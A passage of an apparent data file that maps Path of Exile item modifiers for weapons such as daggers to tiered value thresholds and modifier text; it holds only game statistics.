"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"Dagger": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Poison on Hit": [(50, '(14 - 18)% increased Damage with Poison'), (100, '(19 - 23)% increased Damage with Poison'), (300, '(24 - 28)% increased Damage with Poison\n(25 - 30)% chance to Poison on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed\n(5 - 6)% increased Cast Speed'), (50, '(5 - 6)% increased Attack Speed\n(7 - 9)% increased Cast Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Cast Speed": [(40, '(5 - 6)% increased Cast Speed'), (65, '(7 - 9)% increased Cast Speed'), (200, '(10 - 12)% increased Cast Speed')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Damage with Poison": [(45, '(14 - 18)% increased Damage with Poison'), (90, '(19 - 23)% increased Damage with Poison'), (200, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n0.3% of Mana Regenerated per second')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Poison Duration": [(20, '(14 - 18)% increased Damage with Poison'), (40, '(19 - 23)% increased Damage with Poison'), (100, '(24 - 28)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(5 - 10)% chance to gain a Frenzy Charge on Kill'), (100, '(5 - 10)% chance to gain a Power Charge on Kill')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted\n(40 - 50)% increased Spell Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, 'Adds (1 - 2) to (3 - 4) Cold Damage to Attacks with this Weapon per 10 Dexterity'), (200, '1% increased Spell Damage per 16 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, 'Adds 1 to (5 - 6) Lightning Damage to Attacks with this Weapon per 10 Intelligence'), (200, '1% increased Spell Damage per 16 Intelligence')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana'), (500, '(6 - 8)% increased Attack Damage per 500 Maximum Mana\n(6 - 8)% increased Spell Damage per 500 Maximum Mana')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Damage over Time Multiplier": [(45, '(9 - 10) to Cold Damage over Time Multiplier'), (90, '(11 - 12) to Cold Damage over Time Multiplier'), (500, '(13 - 15) to Cold Damage over Time Multiplier')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"Gloves": {
